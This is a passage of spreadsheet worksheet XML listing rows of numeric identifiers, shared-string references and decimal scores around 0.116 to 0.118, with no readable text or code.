      <c r="C14734" s="2" t="s">
        <v>14203</v>
      </c>
      <c r="D14734" s="2">
        <v>1.0</v>
      </c>
      <c r="E14734" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14734" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="14735" ht="15.75" customHeight="1">
      <c r="A14735" s="1">
        <v>30958.0</v>
      </c>
      <c r="B14735" s="2">
        <v>4742843.0</v>
      </c>
      <c r="C14735" s="2" t="s">
        <v>14204</v>
      </c>
      <c r="D14735" s="2">
        <v>1.0</v>
      </c>
      <c r="E14735" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14735" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="14736" ht="15.75" customHeight="1">
      <c r="A14736" s="1">
        <v>9433.0</v>
      </c>
      <c r="B14736" s="2">
        <v>5.5801594E7</v>
      </c>
      <c r="C14736" s="2" t="s">
        <v>14205</v>
      </c>
      <c r="D14736" s="2">
        <v>1.0</v>
      </c>
      <c r="E14736" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14736" s="2">
        <v>0.1182539682539683</v>
      </c>
    </row>
    <row r="14737" ht="15.75" customHeight="1">
      <c r="A14737" s="1">
        <v>4248.0</v>
      </c>
      <c r="B14737" s="2">
        <v>4.1801813E7</v>
      </c>
      <c r="C14737" s="2" t="s">
        <v>14206</v>
      </c>
      <c r="D14737" s="2">
        <v>1.0</v>
      </c>
      <c r="E14737" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14737" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="14738" ht="15.75" customHeight="1">
      <c r="A14738" s="1">
        <v>9343.0</v>
      </c>
      <c r="B14738" s="2">
        <v>5.5653254E7</v>
      </c>
      <c r="C14738" s="2" t="s">
        <v>14207</v>
      </c>
      <c r="D14738" s="2">
        <v>1.0</v>
      </c>
      <c r="E14738" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14738" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="14739" ht="15.75" customHeight="1">
      <c r="A14739" s="1">
        <v>20745.0</v>
      </c>
      <c r="B14739" s="2">
        <v>1.4789442E7</v>
      </c>
      <c r="C14739" s="2" t="s">
        <v>14208</v>
      </c>
      <c r="D14739" s="2">
        <v>1.0</v>
      </c>
      <c r="E14739" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14739" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="14740" ht="15.75" customHeight="1">
      <c r="A14740" s="1">
        <v>316.0</v>
      </c>
      <c r="B14740" s="2">
        <v>1.5622035E7</v>
      </c>
      <c r="C14740" s="2" t="s">
        <v>14209</v>
      </c>
      <c r="D14740" s="2">
        <v>1.0</v>
      </c>
      <c r="E14740" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14740" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="14741" ht="15.75" customHeight="1">
      <c r="A14741" s="1">
        <v>754.0</v>
      </c>
      <c r="B14741" s="2">
        <v>2.0963992E7</v>
      </c>
      <c r="C14741" s="2" t="s">
        <v>14210</v>
      </c>
      <c r="D14741" s="2">
        <v>1.0</v>
      </c>
      <c r="E14741" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14741" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="14742" ht="15.75" customHeight="1">
      <c r="A14742" s="1">
        <v>1375.0</v>
      </c>
      <c r="B14742" s="2">
        <v>2.6030646E7</v>
      </c>
      <c r="C14742" s="2" t="s">
        <v>14211</v>
      </c>
      <c r="D14742" s="2">
        <v>1.0</v>
      </c>
      <c r="E14742" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14742" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="14743" ht="15.75" customHeight="1">
      <c r="A14743" s="1">
        <v>11522.0</v>
      </c>
      <c r="B14743" s="2">
        <v>2.236273E7</v>
      </c>
      <c r="C14743" s="2" t="s">
        <v>14212</v>
      </c>
      <c r="D14743" s="2">
        <v>1.0</v>
      </c>
      <c r="E14743" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14743" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="14744" ht="15.75" customHeight="1">
      <c r="A14744" s="1">
        <v>15667.0</v>
      </c>
      <c r="B14744" s="2">
        <v>4.3729731E7</v>
      </c>
      <c r="C14744" s="2" t="s">
        <v>14213</v>
      </c>
      <c r="D14744" s="2">
        <v>1.0</v>
      </c>
      <c r="E14744" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14744" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="14745" ht="15.75" customHeight="1">
      <c r="A14745" s="1">
        <v>17100.0</v>
      </c>
      <c r="B14745" s="2">
        <v>4.8682857E7</v>
      </c>
      <c r="C14745" s="2" t="s">
        <v>14214</v>
      </c>
      <c r="D14745" s="2">
        <v>1.0</v>
      </c>
      <c r="E14745" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14745" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="14746" ht="15.75" customHeight="1">
      <c r="A14746" s="1">
        <v>30673.0</v>
      </c>
      <c r="B14746" s="2">
        <v>4.2225184E7</v>
      </c>
      <c r="C14746" s="2" t="s">
        <v>14215</v>
      </c>
      <c r="D14746" s="2">
        <v>1.0</v>
      </c>
      <c r="E14746" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14746" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="14747" ht="15.75" customHeight="1">
      <c r="A14747" s="1">
        <v>468.0</v>
      </c>
      <c r="B14747" s="2">
        <v>1.7350885E7</v>
      </c>
      <c r="C14747" s="2" t="s">
        <v>14216</v>
      </c>
      <c r="D14747" s="2">
        <v>1.0</v>
      </c>
      <c r="E14747" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14747" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="14748" ht="15.75" customHeight="1">
      <c r="A14748" s="1">
        <v>1039.0</v>
      </c>
      <c r="B14748" s="2">
        <v>2.3257299E7</v>
      </c>
      <c r="C14748" s="2" t="s">
        <v>14217</v>
      </c>
      <c r="D14748" s="2">
        <v>1.0</v>
      </c>
      <c r="E14748" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14748" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="14749" ht="15.75" customHeight="1">
      <c r="A14749" s="1">
        <v>19032.0</v>
      </c>
      <c r="B14749" s="2">
        <v>5.4554983E7</v>
      </c>
      <c r="C14749" s="2" t="s">
        <v>14218</v>
      </c>
      <c r="D14749" s="2">
        <v>1.0</v>
      </c>
      <c r="E14749" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14749" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="14750" ht="15.75" customHeight="1">
      <c r="A14750" s="1">
        <v>24877.0</v>
      </c>
      <c r="B14750" s="2">
        <v>1.2228573E7</v>
      </c>
      <c r="C14750" s="2" t="s">
        <v>14219</v>
      </c>
      <c r="D14750" s="2">
        <v>1.0</v>
      </c>
      <c r="E14750" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14750" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="14751" ht="15.75" customHeight="1">
      <c r="A14751" s="1">
        <v>33822.0</v>
      </c>
      <c r="B14751" s="2">
        <v>8907526.0</v>
      </c>
      <c r="C14751" s="2" t="s">
        <v>14220</v>
      </c>
      <c r="D14751" s="2">
        <v>1.0</v>
      </c>
      <c r="E14751" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14751" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="14752" ht="15.75" customHeight="1">
      <c r="A14752" s="1">
        <v>4665.0</v>
      </c>
      <c r="B14752" s="2">
        <v>4.3136816E7</v>
      </c>
      <c r="C14752" s="2" t="s">
        <v>14221</v>
      </c>
      <c r="D14752" s="2">
        <v>1.0</v>
      </c>
      <c r="E14752" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14752" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="14753" ht="15.75" customHeight="1">
      <c r="A14753" s="1">
        <v>4555.0</v>
      </c>
      <c r="B14753" s="2">
        <v>4.2696143E7</v>
      </c>
      <c r="C14753" s="2" t="s">
        <v>14222</v>
      </c>
      <c r="D14753" s="2">
        <v>1.0</v>
      </c>
      <c r="E14753" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14753" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="14754" ht="15.75" customHeight="1">
      <c r="A14754" s="1">
        <v>18636.0</v>
      </c>
      <c r="B14754" s="2">
        <v>5.3408046E7</v>
      </c>
      <c r="C14754" s="2" t="s">
        <v>14223</v>
      </c>
      <c r="D14754" s="2">
        <v>1.0</v>
      </c>
      <c r="E14754" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14754" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="14755" ht="15.75" customHeight="1">
      <c r="A14755" s="1">
        <v>25042.0</v>
      </c>
      <c r="B14755" s="2">
        <v>1.2845577E7</v>
      </c>
      <c r="C14755" s="2" t="s">
        <v>14224</v>
      </c>
      <c r="D14755" s="2">
        <v>1.0</v>
      </c>
      <c r="E14755" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14755" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="14756" ht="15.75" customHeight="1">
      <c r="A14756" s="1">
        <v>31232.0</v>
      </c>
      <c r="B14756" s="2">
        <v>4.9271437E7</v>
      </c>
      <c r="C14756" s="2" t="s">
        <v>14225</v>
      </c>
      <c r="D14756" s="2">
        <v>1.0</v>
      </c>
      <c r="E14756" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14756" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="14757" ht="15.75" customHeight="1">
      <c r="A14757" s="1">
        <v>32546.0</v>
      </c>
      <c r="B14757" s="2">
        <v>5751102.0</v>
      </c>
      <c r="C14757" s="2" t="s">
        <v>14162</v>
      </c>
      <c r="D14757" s="2">
        <v>1.0</v>
      </c>
      <c r="E14757" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14757" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="14758" ht="15.75" customHeight="1">
      <c r="A14758" s="1">
        <v>11531.0</v>
      </c>
      <c r="B14758" s="2">
        <v>2.2538087E7</v>
      </c>
      <c r="C14758" s="2" t="s">
        <v>14226</v>
      </c>
      <c r="D14758" s="2">
        <v>1.0</v>
      </c>
      <c r="E14758" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14758" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="14759" ht="15.75" customHeight="1">
      <c r="A14759" s="1">
        <v>14719.0</v>
      </c>
      <c r="B14759" s="2">
        <v>4.0633959E7</v>
      </c>
      <c r="C14759" s="2" t="s">
        <v>14227</v>
      </c>
      <c r="D14759" s="2">
        <v>1.0</v>
      </c>
      <c r="E14759" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14759" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="14760" ht="15.75" customHeight="1">
      <c r="A14760" s="1">
        <v>15056.0</v>
      </c>
      <c r="B14760" s="2">
        <v>4.167019E7</v>
      </c>
      <c r="C14760" s="2" t="s">
        <v>14228</v>
      </c>
      <c r="D14760" s="2">
        <v>1.0</v>
      </c>
      <c r="E14760" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14760" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="14761" ht="15.75" customHeight="1">
      <c r="A14761" s="1">
        <v>18450.0</v>
      </c>
      <c r="B14761" s="2">
        <v>5.2787533E7</v>
      </c>
      <c r="C14761" s="2" t="s">
        <v>14229</v>
      </c>
      <c r="D14761" s="2">
        <v>1.0</v>
      </c>
      <c r="E14761" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14761" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="14762" ht="15.75" customHeight="1">
      <c r="A14762" s="1">
        <v>26543.0</v>
      </c>
      <c r="B14762" s="2">
        <v>1.7744886E7</v>
      </c>
      <c r="C14762" s="2" t="s">
        <v>14230</v>
      </c>
      <c r="D14762" s="2">
        <v>1.0</v>
      </c>
      <c r="E14762" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14762" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="14763" ht="15.75" customHeight="1">
      <c r="A14763" s="1">
        <v>11329.0</v>
      </c>
      <c r="B14763" s="2">
        <v>2.1093789E7</v>
      </c>
      <c r="C14763" s="2" t="s">
        <v>14231</v>
      </c>
      <c r="D14763" s="2">
        <v>1.0</v>
      </c>
      <c r="E14763" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14763" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="14764" ht="15.75" customHeight="1">
      <c r="A14764" s="1">
        <v>13357.0</v>
      </c>
      <c r="B14764" s="2">
        <v>3.4740944E7</v>
      </c>
      <c r="C14764" s="2" t="s">
        <v>14232</v>
      </c>
      <c r="D14764" s="2">
        <v>1.0</v>
      </c>
      <c r="E14764" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14764" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="14765" ht="15.75" customHeight="1">
      <c r="A14765" s="1">
        <v>22798.0</v>
      </c>
      <c r="B14765" s="2">
        <v>4.5579977E7</v>
      </c>
      <c r="C14765" s="2" t="s">
        <v>14233</v>
      </c>
      <c r="D14765" s="2">
        <v>1.0</v>
      </c>
      <c r="E14765" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14765" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="14766" ht="15.75" customHeight="1">
      <c r="A14766" s="1">
        <v>25881.0</v>
      </c>
      <c r="B14766" s="2">
        <v>1.4962854E7</v>
      </c>
      <c r="C14766" s="2" t="s">
        <v>14234</v>
      </c>
      <c r="D14766" s="2">
        <v>1.0</v>
      </c>
      <c r="E14766" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14766" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="14767" ht="15.75" customHeight="1">
      <c r="A14767" s="1">
        <v>28883.0</v>
      </c>
      <c r="B14767" s="2">
        <v>2.9207931E7</v>
      </c>
      <c r="C14767" s="2" t="s">
        <v>14235</v>
      </c>
      <c r="D14767" s="2">
        <v>1.0</v>
      </c>
      <c r="E14767" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14767" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="14768" ht="15.75" customHeight="1">
      <c r="A14768" s="1">
        <v>29292.0</v>
      </c>
      <c r="B14768" s="2">
        <v>3.1155038E7</v>
      </c>
      <c r="C14768" s="2" t="s">
        <v>14236</v>
      </c>
      <c r="D14768" s="2">
        <v>1.0</v>
      </c>
      <c r="E14768" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14768" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="14769" ht="15.75" customHeight="1">
      <c r="A14769" s="1">
        <v>30750.0</v>
      </c>
      <c r="B14769" s="2">
        <v>4.4154426E7</v>
      </c>
      <c r="C14769" s="2" t="s">
        <v>14237</v>
      </c>
      <c r="D14769" s="2">
        <v>1.0</v>
      </c>
      <c r="E14769" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14769" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="14770" ht="15.75" customHeight="1">
      <c r="A14770" s="1">
        <v>17091.0</v>
      </c>
      <c r="B14770" s="2">
        <v>4.8652512E7</v>
      </c>
      <c r="C14770" s="2" t="s">
        <v>14238</v>
      </c>
      <c r="D14770" s="2">
        <v>1.0</v>
      </c>
      <c r="E14770" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14770" s="2">
        <v>0.1170940170940171</v>
      </c>
    </row>
    <row r="14771" ht="15.75" customHeight="1">
      <c r="A14771" s="1">
        <v>13159.0</v>
      </c>
      <c r="B14771" s="2">
        <v>3.389818E7</v>
      </c>
      <c r="C14771" s="2" t="s">
        <v>14239</v>
      </c>
      <c r="D14771" s="2">
        <v>1.0</v>
      </c>
      <c r="E14771" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14771" s="2">
        <v>0.1165123456790124</v>
      </c>
    </row>
    <row r="14772" ht="15.75" customHeight="1">
      <c r="A14772" s="1">
        <v>30221.0</v>
      </c>
      <c r="B14772" s="2">
        <v>3.740005E7</v>
      </c>
      <c r="C14772" s="2" t="s">
        <v>14240</v>
      </c>
      <c r="D14772" s="2">
        <v>1.0</v>
      </c>
      <c r="E14772" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14772" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="14773" ht="15.75" customHeight="1">
      <c r="A14773" s="1">
        <v>31542.0</v>
      </c>
      <c r="B14773" s="2">
        <v>5104723.0</v>
      </c>
      <c r="C14773" s="2" t="s">
        <v>14241</v>
      </c>
      <c r="D14773" s="2">
        <v>1.0</v>
      </c>
      <c r="E14773" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14773" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="14774" ht="15.75" customHeight="1">
      <c r="A14774" s="1">
        <v>1308.0</v>
      </c>
      <c r="B14774" s="2">
        <v>2.5696605E7</v>
      </c>
      <c r="C14774" s="2" t="s">
        <v>14242</v>
      </c>
      <c r="D14774" s="2">
        <v>1.0</v>
      </c>
      <c r="E14774" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14774" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14775" ht="15.75" customHeight="1">
      <c r="A14775" s="1">
        <v>1667.0</v>
      </c>
      <c r="B14775" s="2">
        <v>2.8205035E7</v>
      </c>
      <c r="C14775" s="2" t="s">
        <v>14243</v>
      </c>
      <c r="D14775" s="2">
        <v>1.0</v>
      </c>
      <c r="E14775" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14775" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14776" ht="15.75" customHeight="1">
      <c r="A14776" s="1">
        <v>3580.0</v>
      </c>
      <c r="B14776" s="2">
        <v>3.899095E7</v>
      </c>
      <c r="C14776" s="2" t="s">
        <v>14244</v>
      </c>
      <c r="D14776" s="2">
        <v>1.0</v>
      </c>
      <c r="E14776" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14776" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14777" ht="15.75" customHeight="1">
      <c r="A14777" s="1">
        <v>4576.0</v>
      </c>
      <c r="B14777" s="2">
        <v>4.276665E7</v>
      </c>
      <c r="C14777" s="2" t="s">
        <v>14245</v>
      </c>
      <c r="D14777" s="2">
        <v>1.0</v>
      </c>
      <c r="E14777" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14777" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14778" ht="15.75" customHeight="1">
      <c r="A14778" s="1">
        <v>5003.0</v>
      </c>
      <c r="B14778" s="2">
        <v>4.4177805E7</v>
      </c>
      <c r="C14778" s="2" t="s">
        <v>14246</v>
      </c>
      <c r="D14778" s="2">
        <v>1.0</v>
      </c>
      <c r="E14778" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14778" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14779" ht="15.75" customHeight="1">
      <c r="A14779" s="1">
        <v>5034.0</v>
      </c>
      <c r="B14779" s="2">
        <v>4.4266737E7</v>
      </c>
      <c r="C14779" s="2" t="s">
        <v>14247</v>
      </c>
      <c r="D14779" s="2">
        <v>1.0</v>
      </c>
      <c r="E14779" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14779" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14780" ht="15.75" customHeight="1">
      <c r="A14780" s="1">
        <v>6158.0</v>
      </c>
      <c r="B14780" s="2">
        <v>4.7869657E7</v>
      </c>
      <c r="C14780" s="2" t="s">
        <v>14248</v>
      </c>
      <c r="D14780" s="2">
        <v>1.0</v>
      </c>
      <c r="E14780" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14780" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14781" ht="15.75" customHeight="1">
      <c r="A14781" s="1">
        <v>6458.0</v>
      </c>
      <c r="B14781" s="2">
        <v>4.8611517E7</v>
      </c>
      <c r="C14781" s="2" t="s">
        <v>14249</v>
      </c>
      <c r="D14781" s="2">
        <v>1.0</v>
      </c>
      <c r="E14781" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14781" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14782" ht="15.75" customHeight="1">
      <c r="A14782" s="1">
        <v>6714.0</v>
      </c>
      <c r="B14782" s="2">
        <v>4.9250691E7</v>
      </c>
      <c r="C14782" s="2" t="s">
        <v>14250</v>
      </c>
      <c r="D14782" s="2">
        <v>1.0</v>
      </c>
      <c r="E14782" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14782" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14783" ht="15.75" customHeight="1">
      <c r="A14783" s="1">
        <v>6807.0</v>
      </c>
      <c r="B14783" s="2">
        <v>4.9525029E7</v>
      </c>
      <c r="C14783" s="2" t="s">
        <v>14251</v>
      </c>
      <c r="D14783" s="2">
        <v>1.0</v>
      </c>
      <c r="E14783" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14783" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14784" ht="15.75" customHeight="1">
      <c r="A14784" s="1">
        <v>7067.0</v>
      </c>
      <c r="B14784" s="2">
        <v>5.0234692E7</v>
      </c>
      <c r="C14784" s="2" t="s">
        <v>14252</v>
      </c>
      <c r="D14784" s="2">
        <v>1.0</v>
      </c>
      <c r="E14784" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14784" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14785" ht="15.75" customHeight="1">
      <c r="A14785" s="1">
        <v>7883.0</v>
      </c>
      <c r="B14785" s="2">
        <v>5.2417149E7</v>
      </c>
      <c r="C14785" s="2" t="s">
        <v>14253</v>
      </c>
      <c r="D14785" s="2">
        <v>1.0</v>
      </c>
      <c r="E14785" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14785" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14786" ht="15.75" customHeight="1">
      <c r="A14786" s="1">
        <v>9532.0</v>
      </c>
      <c r="B14786" s="2">
        <v>5.5985608E7</v>
      </c>
      <c r="C14786" s="2" t="s">
        <v>14254</v>
      </c>
      <c r="D14786" s="2">
        <v>1.0</v>
      </c>
      <c r="E14786" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14786" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14787" ht="15.75" customHeight="1">
      <c r="A14787" s="1">
        <v>9966.0</v>
      </c>
      <c r="B14787" s="2">
        <v>5.6939302E7</v>
      </c>
      <c r="C14787" s="2" t="s">
        <v>14255</v>
      </c>
      <c r="D14787" s="2">
        <v>1.0</v>
      </c>
      <c r="E14787" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14787" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14788" ht="15.75" customHeight="1">
      <c r="A14788" s="1">
        <v>11235.0</v>
      </c>
      <c r="B14788" s="2">
        <v>2.0381452E7</v>
      </c>
      <c r="C14788" s="2" t="s">
        <v>14256</v>
      </c>
      <c r="D14788" s="2">
        <v>1.0</v>
      </c>
      <c r="E14788" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14788" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14789" ht="15.75" customHeight="1">
      <c r="A14789" s="1">
        <v>13037.0</v>
      </c>
      <c r="B14789" s="2">
        <v>3.3040005E7</v>
      </c>
      <c r="C14789" s="2" t="s">
        <v>14257</v>
      </c>
      <c r="D14789" s="2">
        <v>1.0</v>
      </c>
      <c r="E14789" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14789" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14790" ht="15.75" customHeight="1">
      <c r="A14790" s="1">
        <v>13055.0</v>
      </c>
      <c r="B14790" s="2">
        <v>3.3208275E7</v>
      </c>
      <c r="C14790" s="2" t="s">
        <v>14258</v>
      </c>
      <c r="D14790" s="2">
        <v>1.0</v>
      </c>
      <c r="E14790" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14790" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14791" ht="15.75" customHeight="1">
      <c r="A14791" s="1">
        <v>13241.0</v>
      </c>
      <c r="B14791" s="2">
        <v>3.4265174E7</v>
      </c>
      <c r="C14791" s="2" t="s">
        <v>14259</v>
      </c>
      <c r="D14791" s="2">
        <v>1.0</v>
      </c>
      <c r="E14791" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14791" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14792" ht="15.75" customHeight="1">
      <c r="A14792" s="1">
        <v>14814.0</v>
      </c>
      <c r="B14792" s="2">
        <v>4.094427E7</v>
      </c>
      <c r="C14792" s="2" t="s">
        <v>14260</v>
      </c>
      <c r="D14792" s="2">
        <v>1.0</v>
      </c>
      <c r="E14792" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14792" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14793" ht="15.75" customHeight="1">
      <c r="A14793" s="1">
        <v>15365.0</v>
      </c>
      <c r="B14793" s="2">
        <v>4.2724437E7</v>
      </c>
      <c r="C14793" s="2" t="s">
        <v>14261</v>
      </c>
      <c r="D14793" s="2">
        <v>1.0</v>
      </c>
      <c r="E14793" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14793" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14794" ht="15.75" customHeight="1">
      <c r="A14794" s="1">
        <v>15400.0</v>
      </c>
      <c r="B14794" s="2">
        <v>4.2827754E7</v>
      </c>
      <c r="C14794" s="2" t="s">
        <v>14262</v>
      </c>
      <c r="D14794" s="2">
        <v>1.0</v>
      </c>
      <c r="E14794" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14794" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14795" ht="15.75" customHeight="1">
      <c r="A14795" s="1">
        <v>16213.0</v>
      </c>
      <c r="B14795" s="2">
        <v>4.5705119E7</v>
      </c>
      <c r="C14795" s="2" t="s">
        <v>14263</v>
      </c>
      <c r="D14795" s="2">
        <v>1.0</v>
      </c>
      <c r="E14795" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14795" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14796" ht="15.75" customHeight="1">
      <c r="A14796" s="1">
        <v>17201.0</v>
      </c>
      <c r="B14796" s="2">
        <v>4.901572E7</v>
      </c>
      <c r="C14796" s="2" t="s">
        <v>14264</v>
      </c>
      <c r="D14796" s="2">
        <v>1.0</v>
      </c>
      <c r="E14796" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14796" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14797" ht="15.75" customHeight="1">
      <c r="A14797" s="1">
        <v>17292.0</v>
      </c>
      <c r="B14797" s="2">
        <v>4.9243069E7</v>
      </c>
      <c r="C14797" s="2" t="s">
        <v>14265</v>
      </c>
      <c r="D14797" s="2">
        <v>1.0</v>
      </c>
      <c r="E14797" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14797" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14798" ht="15.75" customHeight="1">
      <c r="A14798" s="1">
        <v>17747.0</v>
      </c>
      <c r="B14798" s="2">
        <v>5.0680936E7</v>
      </c>
      <c r="C14798" s="2" t="s">
        <v>14266</v>
      </c>
      <c r="D14798" s="2">
        <v>1.0</v>
      </c>
      <c r="E14798" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14798" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14799" ht="15.75" customHeight="1">
      <c r="A14799" s="1">
        <v>18033.0</v>
      </c>
      <c r="B14799" s="2">
        <v>5.153583E7</v>
      </c>
      <c r="C14799" s="2" t="s">
        <v>14267</v>
      </c>
      <c r="D14799" s="2">
        <v>1.0</v>
      </c>
      <c r="E14799" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14799" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14800" ht="15.75" customHeight="1">
      <c r="A14800" s="1">
        <v>19457.0</v>
      </c>
      <c r="B14800" s="2">
        <v>5.574874E7</v>
      </c>
      <c r="C14800" s="2" t="s">
        <v>14268</v>
      </c>
      <c r="D14800" s="2">
        <v>1.0</v>
      </c>
      <c r="E14800" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14800" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="14801" ht="15.75" customHeight="1">
      <c r="A14801" s="1">
        <v>22168.0</v>
      </c>
      <c r="B14801" s="2">
        <v>3.1612982E7</v>
      </c>
